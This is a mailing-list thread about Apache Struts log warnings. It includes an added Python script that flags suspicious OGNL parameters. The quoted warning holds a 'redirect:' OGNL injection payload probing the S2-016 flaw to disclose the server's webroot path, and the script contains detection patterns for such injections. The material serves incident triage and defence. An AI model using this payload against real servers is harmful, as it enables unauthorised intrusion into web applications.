Thu, 25 Mar 2021 at 11:12, Greg Huber <gregh3...@gmail.com> wrote:
>
> Seem to be getting lots of these log warnings recently. Anything to
> worry about?
>
> 2021-03-24 12:29:40,439 WARN
> com.opensymphony.xwork2.interceptor.ParametersInterceptor
> ParametersInterceptor:isWithinLengthLimit - Parameter
> [redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("xfdir"),#res.getWriter().print("xfdir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().print("xfdir:"),#res.getWriter().flush(),#res.getWriter().close()}]
> is too long, allowed length is [100]

Rather no (if you are up to date), someone is trying to hack your
website using an old vulnerability with "redirect:":

https://cwiki.apache.org/confluence/display/WW/S2-016
https://cwiki.apache.org/confluence/display/WW/S2-017

Regards
-- 
Łukasz
+ 48 606 323 122 http://www.lenart.org.pl/
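
A log triage sketch for the warning discussed in this thread, added here as an example (it is not from the posters or the Struts project): it picks out `ParametersInterceptor` length-limit warnings whose parameter name starts with an S2-016 prefix and contains OGNL syntax. The sample log lines are constructed (the first is abbreviated from the quoted warning), and the function names are assumptions.

```python
import re

# Parameter-name prefixes covered by S2-016; "redirect:" is the one in the log above.
PREFIXES = ("redirect:", "redirectAction:", "action:")

# The ParametersInterceptor length-limit warning, in the format quoted in the thread.
WARN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) WARN .*?"
    r"isWithinLengthLimit - Parameter \[(?P<name>.*)\] is too long, "
    r"allowed length is \[(?P<limit>\d+)\]\s*$"
)

# OGNL expression delimiters and context references seen in such parameter names.
OGNL_RE = re.compile(r"[$%]\{|#context\b|#_memberAccess\b")

# Constructed sample input; the first line is abbreviated from the quoted warning.
SAMPLE_LOG = [
    "2021-03-24 12:29:40,439 WARN com.opensymphony.xwork2.interceptor.ParametersInterceptor "
    "ParametersInterceptor:isWithinLengthLimit - Parameter [redirect:${#res=#context.get("
    "'com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.getWriter().close()}] "
    "is too long, allowed length is [100]",
    "2021-03-24 12:31:02,118 WARN com.opensymphony.xwork2.interceptor.ParametersInterceptor "
    "ParametersInterceptor:isWithinLengthLimit - Parameter [filter." + "x" * 120 + "] "
    "is too long, allowed length is [100]",
    "2021-03-24 12:31:05,004 INFO org.example.app.Startup ready",
]


def classify(line):
    """Return a finding for a length-limit warning, or None for any other line."""
    m = WARN_RE.match(line.strip())
    if not m:
        return None
    name = m.group("name")
    prefix = next((p for p in PREFIXES if name.startswith(p)), None)
    ognl = bool(OGNL_RE.search(name))
    return {"timestamp": m.group("ts"), "prefix": prefix, "ognl": ognl,
            "length": len(name), "suspicious": prefix is not None and ognl}


def scan(lines):
    """Return (suspicious warnings, all length-limit warnings) for the given lines."""
    warnings = [f for f in map(classify, lines) if f]
    return [f for f in warnings if f["suspicious"]], warnings
```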